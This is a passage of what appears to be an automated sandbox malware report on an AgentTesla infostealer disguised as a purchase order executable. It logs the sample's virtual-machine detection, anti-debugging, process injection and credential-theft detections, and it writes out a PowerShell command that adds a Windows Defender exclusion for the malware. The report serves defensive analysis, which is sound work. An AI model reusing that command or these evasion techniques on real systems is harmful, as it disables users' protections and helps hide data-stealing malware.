                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5127
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2128
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4329
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2904
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Window / User API: threadDelayed 3085
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Window / User API: threadDelayed 6729
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1332 Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep count: 4329 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep count: 2904 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228 Thread sleep count: 52 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1320 Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6112 Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220 Thread sleep count: 3085 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220 Thread sleep count: 6729 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWy
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: AdvancedRun.exe, 00000023.00000002.431211915.000000000083B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging:

                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Thread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Thread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Code function: 32_2_010D28B8 LdrInitializeThunk,32_2_010D28B8
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,5_2_00401C26
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Process created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Process created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe Process created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Queries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe, Code function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,5_2_0040A272
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match, File source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
                      Source: Yara match, File source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match, File source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
